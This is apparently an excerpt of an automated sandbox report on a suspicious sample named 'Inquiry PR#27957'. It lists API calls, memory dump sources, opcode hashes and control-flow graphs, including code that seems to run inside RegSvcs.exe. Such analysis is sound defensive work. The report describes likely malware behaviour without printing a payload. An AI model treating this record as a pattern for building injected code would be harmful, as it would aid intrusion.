                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 073495E5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02DBDE86
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351684000.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2db0000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351206400.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_127d000_Inquiry PR#27957.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351249908.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_128d000_Inquiry PR#27957.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351249908.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_128d000_Inquiry PR#27957.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351206400.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_127d000_Inquiry PR#27957.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351249908.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_128d000_Inquiry PR#27957.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351249908.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_128d000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                                        • Instruction ID: be4e1182c186dd1a080a562737a78252287d63aa71d9e869e3dda687213e879c
                                                        • Opcode Fuzzy Hash: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                                        • Instruction Fuzzy Hash: 6F11EB75508284CFDB02DF54D5C4B15BBA2FB84314F24C6AAD9494B696C33AD40BCBA2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351206400.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_127d000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e61d90f8cdfb84b963a7a64bc6d21134e485c309526533b01de3b368cd298892
                                                        • Instruction ID: ed340616bedc36bcb9613f86076a09405daee15ceada8a1146235e0cf591e161
                                                        • Opcode Fuzzy Hash: e61d90f8cdfb84b963a7a64bc6d21134e485c309526533b01de3b368cd298892
                                                        • Instruction Fuzzy Hash: 7E01DB311183899BF7289EA9CD84B67FF98DF41224F14C51AEE590E282D6B99840CAB1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351206400.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_127d000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a9a790ae4391df2ac43e921d6441fa2f47ad60f111d621169ff5cb83e5b776c9
                                                        • Instruction ID: f238dd94007d5a0a0bb8bb5728a7b28b2bb12e26d386d3b830dd53f52631ce55
                                                        • Opcode Fuzzy Hash: a9a790ae4391df2ac43e921d6441fa2f47ad60f111d621169ff5cb83e5b776c9
                                                        • Instruction Fuzzy Hash: BFF06D71408384AEE7149E5ADD88B63FF98EF81734F18C55AEE484E297C2799844CAB1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351684000.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2db0000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: f37ff328c5bc44d8c971bf572040dabebb340be59a2a94d0d80cb7c74f0168d9
                                                        • Instruction ID: 4312469faa567befd3556b04d514638fc747b732fff50b21193b16e0492eaf30
                                                        • Opcode Fuzzy Hash: f37ff328c5bc44d8c971bf572040dabebb340be59a2a94d0d80cb7c74f0168d9
                                                        • Instruction Fuzzy Hash: C351E231B142558FCB14CBA9D8946EEBBF2EFC9211B14857AD60ADB345EB30EC51CB90
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1364658564.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5430000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b2c17eeff4818d28d07f80f32f7adf8854c54ab565ad9e8f303d32bc300b933c
                                                        • Instruction ID: e296b28d51a9953392f78c7963bd1e92d10d8da3e2a0ba62505bbd46cddd169b
                                                        • Opcode Fuzzy Hash: b2c17eeff4818d28d07f80f32f7adf8854c54ab565ad9e8f303d32bc300b933c
                                                        • Instruction Fuzzy Hash: 4F1292B0C81745CAEB11EF65F95C18D3BA1BB8139CBD04A09D2652F3E1DBB8196ACF44
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d82d7b7e0e9504a7196756c3e5b330f492d98a0757367ebdc684ca7c740da072
                                                        • Instruction ID: 830d50d34fd65fcae78b7edbc87d1661d7afebe34e0d05bae479b023f460c768
                                                        • Opcode Fuzzy Hash: d82d7b7e0e9504a7196756c3e5b330f492d98a0757367ebdc684ca7c740da072
                                                        • Instruction Fuzzy Hash: 6CE1F9B4E102198FDB14DF99C580AAEBBF2FF89305F248159E819A735AD730AD41CF61
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fab0d500ad28727dfbf271c3c9622c3c0d3c9ff0077976f930a5fe8b10bb8a4e
                                                        • Instruction ID: fa89dfff23021ba27f876e37df0e8197cb8fc4d30cf634e21b110a860b8f05d7
                                                        • Opcode Fuzzy Hash: fab0d500ad28727dfbf271c3c9622c3c0d3c9ff0077976f930a5fe8b10bb8a4e
                                                        • Instruction Fuzzy Hash: 64E1D9B4E002598FDB18DFA9C580AAEBBF2FF89305F248169D419A7356D731AD41CF60
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 754fe81298acb543d7cc3578e551d8477e075dba4187906a38d9a66503c2f492
                                                        • Instruction ID: a47bee7568daa5574e5dd734e18b8be62f0b0c82d822f723b1fe8709f71d454d
                                                        • Opcode Fuzzy Hash: 754fe81298acb543d7cc3578e551d8477e075dba4187906a38d9a66503c2f492
                                                        • Instruction Fuzzy Hash: F1E1D7B4E002198FDB18DFA9C590AAEBBF2FF89305F248169E419A7355D731AD41CF60
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f96ad9d594bf883b7d9cb9d92c579d036f8f2521efc1424272bf7dc7a430efc3
                                                        • Instruction ID: d691c26b66aa61c94878ad7fd0336824cf169e4dc97fd2f7480507bbe648e378
                                                        • Opcode Fuzzy Hash: f96ad9d594bf883b7d9cb9d92c579d036f8f2521efc1424272bf7dc7a430efc3
                                                        • Instruction Fuzzy Hash: 3EE1F9B4E002598FDB18DF99C580AAEBBF2FF89305F248169D419A735AD731AD41CF60
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1364658564.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5430000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6d0cc4f58fc45504c410ac5930049609c4137a388ffd353b944a0db671f70d49
                                                        • Instruction ID: 422653652a8fcf7c17920d6c230d5806f449a768d215649f27870d58bdfd13ca
                                                        • Opcode Fuzzy Hash: 6d0cc4f58fc45504c410ac5930049609c4137a388ffd353b944a0db671f70d49
                                                        • Instruction Fuzzy Hash: 0FA15E36E00215CFCF05DFB5C8485EEB7B2FF88304B1545AAE906AB265DB71E955CB80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351684000.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2db0000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 330a66912c4d99dffc8f29b36c29a8b4cf061483b9d6109073434f9dcc6d6873
                                                        • Instruction ID: f83b10988591c3d1bba0f4a95c5de887866742048bffa26b9271fc13eafdb569
                                                        • Opcode Fuzzy Hash: 330a66912c4d99dffc8f29b36c29a8b4cf061483b9d6109073434f9dcc6d6873
                                                        • Instruction Fuzzy Hash: 47816C36F101649FD754DB69C8A0B9EB7E3AFC8710F1A8065E40AEB365DB70AC01DB90
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1364658564.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5430000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0ee9ce72b81e664d549d1b03e5d39c6b31833ba582f63c56f052dd27f62b8193
                                                        • Instruction ID: 9e9a75baeb94761b3157712bc6c3b1c9193eeff08dd17c50f6f1d3bc6b2dd44f
                                                        • Opcode Fuzzy Hash: 0ee9ce72b81e664d549d1b03e5d39c6b31833ba582f63c56f052dd27f62b8193
                                                        • Instruction Fuzzy Hash: B4C1D4B0C81749CADB11EF65F85828D7BB1BB853ACF904A09D2616F3D0DBB4186ACF54
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351684000.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2db0000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4cb46133481ba3d60aa10f335084fe528ab9d1694033d6cfa1f58f6e8869cfa7
                                                        • Instruction ID: d51538e614f43af8f3cb0c45259b69c7b3dd40921305eda90efb80eb9077fd01
                                                        • Opcode Fuzzy Hash: 4cb46133481ba3d60aa10f335084fe528ab9d1694033d6cfa1f58f6e8869cfa7
                                                        • Instruction Fuzzy Hash: BA81F5B8D4011ADFDF14CFAAE894AEEBBB1FF48305F10A655D402EB250DB319941CB50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351684000.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2db0000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 192fcc62ab16421e732d6c13bbf84498edfad430781975b2536b7a33520fa3e6
                                                        • Instruction ID: 09088bad151e1996ffe1c7014b4e3dd3763a4a81a4cd885d38b680e9224dfc0c
                                                        • Opcode Fuzzy Hash: 192fcc62ab16421e732d6c13bbf84498edfad430781975b2536b7a33520fa3e6
                                                        • Instruction Fuzzy Hash: 32614C36F105648FD754DB69C890B9EB7E3AFC8710F1A8164E40AEB366DE70AC01DB90
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8da66ecaf44582a98638a609831e844c39117a217996ee8857f68784f57478ed
                                                        • Instruction ID: ab2494ca577d65024b92862d024c4bc830c0f3ed96c910d21c0d87facbf53de3
                                                        • Opcode Fuzzy Hash: 8da66ecaf44582a98638a609831e844c39117a217996ee8857f68784f57478ed
                                                        • Instruction Fuzzy Hash: 675109B0E006198FDB18DFA9C5805AEFBF2BF89305F248169D418B7256D731AD42CFA1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4ef020eb50c0eef4a67ee1d12d96b12c068ad7201f97eefa331184d3376d3a7e
                                                        • Instruction ID: 4a71363d05ba1f090e5f7e8781e3ec07151c1739759c4a7d27875f811a696d34
                                                        • Opcode Fuzzy Hash: 4ef020eb50c0eef4a67ee1d12d96b12c068ad7201f97eefa331184d3376d3a7e
                                                        • Instruction Fuzzy Hash: 76512EB5E002598FDB18DFA9C5405AEFBF2FF89305F148169D418A7256D730AD42CFA1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ec4eb40b1fc6fe179d79aaef278d352d8e3dad991886316c5d1a6aeb268d499c
                                                        • Instruction ID: 29b11083fbe54b9f82cc25f19e9cd25e778c24b0fbd81ddd5641e7d2c54c756b
                                                        • Opcode Fuzzy Hash: ec4eb40b1fc6fe179d79aaef278d352d8e3dad991886316c5d1a6aeb268d499c
                                                        • Instruction Fuzzy Hash: 9851F8B0E042198FDB18DFA9C5405AEFBF2FF89205F248169D458AB356D731A941CFA1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 297e155783a1b8fa6c8b545f9fe18050ab4d2cb24613f5638a78fb3f7141f9d6
                                                        • Instruction ID: 97a299450a67033810803b4edaf2d1a4223fc87caa21b57ec5fb2add7caebdfd
                                                        • Opcode Fuzzy Hash: 297e155783a1b8fa6c8b545f9fe18050ab4d2cb24613f5638a78fb3f7141f9d6
                                                        • Instruction Fuzzy Hash: BD5108B4E002598FDB18DFA9C5806AEFBF2FF89301F248169D418A7256D731AD41CFA1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 18b9f964d57a8acfb1f8607aab166e78ad1c9cb482aa953dd6fa3cc606b62eb1
                                                        • Instruction ID: 336410a93b4d77d215e0ddc236f20bce18a75a6cbf5b0c9971e84ae3b6e5093e
                                                        • Opcode Fuzzy Hash: 18b9f964d57a8acfb1f8607aab166e78ad1c9cb482aa953dd6fa3cc606b62eb1
                                                        • Instruction Fuzzy Hash: 3DC08CD699D004D6EA040C882C4C2FAF7FCC28B031F0433A2872EE39D29100B1269256

                                                        Execution Graph

                                                        Execution Coverage:1.2%
                                                        Dynamic/Decrypted Code Coverage:5.1%
                                                        Signature Coverage:8.1%
                                                        Total number of Nodes:136
                                                        Total number of Limit Nodes:9

                                                        Control-flow Graph

                                                        control_flow_graph 102 417913-41793c call 42eb33 105 417942-417950 call 42f053 102->105 106 41793e-417941 102->106 109 417960-417971 call 42d4f3 105->109 110 417952-41795d call 42f2f3 105->110 115 417973-417987 LdrLoadDll 109->115 116 41798a-41798d 109->116 110->109 115->116
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417985
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: cd9ef4a3d1cd7a6e3907838b070924880f9e6a418b5da6b2b4a7b2e5adf3a120
                                                        • Instruction ID: 74945818648602d11457b92e75b4ed94df5a456d8a4b583e1234a9673d5c7db5
                                                        • Opcode Fuzzy Hash: cd9ef4a3d1cd7a6e3907838b070924880f9e6a418b5da6b2b4a7b2e5adf3a120
                                                        • Instruction Fuzzy Hash: 360175B5E4010DABDF10DBE5DC42FDEB378AB54308F0041A6F90897240F679EB488B95

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 122 42bdb3-42bdef call 404893 call 42cff3 NtClose
                                                        APIs
                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BDEA
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: de80a8ed71822f980c586ba2ccbcacc3d85843b4b81fd9b74fa0ebae53fbcab3
                                                        • Instruction ID: 32c3fbc2eaf25ffa26c8e6bc6a9ff2fe44ba59d3bfffa60a7225b309ec458e0a
                                                        • Opcode Fuzzy Hash: de80a8ed71822f980c586ba2ccbcacc3d85843b4b81fd9b74fa0ebae53fbcab3
                                                        • Instruction Fuzzy Hash: BBE0DF722006047BC120FA5ADC01F9B735CDBC5314F00842AFA08A7181C670790087E0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 136 1662b60-1662b6c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: ccb6725167cf3c6fcc5f46eae2291cf729cf734ab64d7158a4eff0fe6b893c86
                                                        • Instruction ID: c094ff774621442249ccdcac35c2955db6d1e2b771fcc15579f40e1bd43956a3
                                                        • Opcode Fuzzy Hash: ccb6725167cf3c6fcc5f46eae2291cf729cf734ab64d7158a4eff0fe6b893c86
                                                        • Instruction Fuzzy Hash: 1D90026120240003410575584818617400E97E0201B55C131E5014690EC5258D916225

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 138 1662df0-1662dfc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b1275f5b4134a9eabfff8456f208cd0bd0f5a29d9aba5dd2adebfcf7deae027b
                                                        • Instruction ID: 01099398d30b42247e3df16b17c272a8bb82719c0f9b863466386cdee242d7ec
                                                        • Opcode Fuzzy Hash: b1275f5b4134a9eabfff8456f208cd0bd0f5a29d9aba5dd2adebfcf7deae027b
                                                        • Instruction Fuzzy Hash: AB90023120140413D11175584908707000D97D0241F95C522A4424658ED6568E52A221

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 137 1662c70-1662c7c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 7ca7b8c27e3b85ab1a0cfbbc4a53b0f63c82ae3d7ca6e55d84049a62e1547f0c
                                                        • Instruction ID: 8973fd18af62722bdd88b5a23aa77d3e606dfabfa1f0fd2dadebea27c8fbdbdc
                                                        • Opcode Fuzzy Hash: 7ca7b8c27e3b85ab1a0cfbbc4a53b0f63c82ae3d7ca6e55d84049a62e1547f0c
                                                        • Instruction Fuzzy Hash: F190023120148802D1107558880874B000997D0301F59C521A8424758EC6958D917221
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 04ff427de91c0fb5ebcc53651d1404b52c0799689a0536d554b0d86fe7b9cbb2
                                                        • Instruction ID: adcc88ee3b730a4b697f022d5ec0c7c6909c62dee0de702fd0d024830faa3541
                                                        • Opcode Fuzzy Hash: 04ff427de91c0fb5ebcc53651d1404b52c0799689a0536d554b0d86fe7b9cbb2
                                                        • Instruction Fuzzy Hash: 1690023160550402D10075584918707100997D0201F65C521A4424668EC7958E5166A2

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 413ce1-413ce2 1 413ce4 0->1 2 413d4e 0->2 5 413d25-413d2e 1->5 6 413ce6-413cec 1->6 3 413d50-413d51 2->3 4 413da6 2->4 9 413d54-413d57 3->9 10 413da8-413da9 4->10 11 413ddf-413e2d call 42e8e3 call 417913 call 404803 call 424b93 4->11 7 413d30-413d41 5->7 8 413cf3-413cf4 5->8 6->8 13 413d70-413d71 7->13 14 413d43 7->14 16 413cf6-413cf9 8->16 17 413d0a-413d0c 8->17 15 413d58 9->15 18 413dba-413ddd call 42ded3 10->18 35 413e4d-413e53 11->35 36 413e2f-413e3e PostThreadMessageW 11->36 13->9 24 413d73-413d79 13->24 14->18 20 413d45-413d4d 14->20 22 413d59-413d68 15->22 23 413cfd-413d08 15->23 17->15 25 413d0d-413d11 17->25 18->11 20->2 22->13 23->17 27 413d15-413d23 25->27 28 413d14 25->28 27->5 28->27 36->35 37 413e40-413e4a 36->37 37->35
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 30-335c-$30-335c-
                                                        • API String ID: 0-1592865780
                                                        • Opcode ID: eacb5baa2b6cfdd3c8b8261989c4bc8f124ec9fcbed5c2f4814ba173bd3b4392
                                                        • Instruction ID: 048fed76f797afb83908ad8893dc0dca1282d4dda37ef2dbcd98be1ab3f9ded1
                                                        • Opcode Fuzzy Hash: eacb5baa2b6cfdd3c8b8261989c4bc8f124ec9fcbed5c2f4814ba173bd3b4392
                                                        • Instruction Fuzzy Hash: 6931CC72904209BEDB018FA5EC41EDF7B3CEE45766B04425EF450A7282D3288F828BA5

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 38 413d7b-413d7e 39 413d80-413da9 38->39 40 413ded-413df5 38->40 39->40 41 413dfb-413e2d call 404803 call 424b93 40->41 42 413df6 call 417913 40->42 48 413e4d-413e53 41->48 49 413e2f-413e3e PostThreadMessageW 41->49 42->41 49->48 50 413e40-413e4a 49->50 50->48
                                                        APIs
                                                        • PostThreadMessageW.USER32(30-335c-,00000111,00000000,00000000), ref: 00413E3A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: 30-335c-$30-335c-
                                                        • API String ID: 1836367815-1592865780
                                                        • Opcode ID: c2a623f45fb9361cd137173174bc357b294e581cc9702b29c37b884e275eeee5
                                                        • Instruction ID: 837132a53ce44f4b1b7ac508ec9cc42e8dacc8fd16aa5aa2ab07f14575c0c31d
                                                        • Opcode Fuzzy Hash: c2a623f45fb9361cd137173174bc357b294e581cc9702b29c37b884e275eeee5
                                                        • Instruction Fuzzy Hash: 5B0189B2C04208BAC7106AA09C82EEF772CEE45710F048176B954B7201C16D4F0307F5

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 51 413db6-413dd5 52 413ddd-413e2d call 42e8e3 call 417913 call 404803 call 424b93 51->52 53 413dd8 call 42ded3 51->53 63 413e4d-413e53 52->63 64 413e2f-413e3e PostThreadMessageW 52->64 53->52 64->63 65 413e40-413e4a 64->65 65->63
                                                        APIs
                                                        • PostThreadMessageW.USER32(30-335c-,00000111,00000000,00000000), ref: 00413E3A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID: 30-335c-$30-335c-
                                                        • API String ID: 1836367815-1592865780
                                                        • Opcode ID: 61a3df200abc970491f61343a6b98468a973e7cc42545bed0d80ea247a87058c
                                                        • Instruction ID: f0118cf9bf90cffc78d3d78335e103d8e7e68d668ba7c426319888d99f914260
                                                        • Opcode Fuzzy Hash: 61a3df200abc970491f61343a6b98468a973e7cc42545bed0d80ea247a87058c
                                                        • Instruction Fuzzy Hash: 83112972D0020CBADB11ABE19C81DEF7B7CDF44794F44805AFA04B7141D6789F068BA5

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
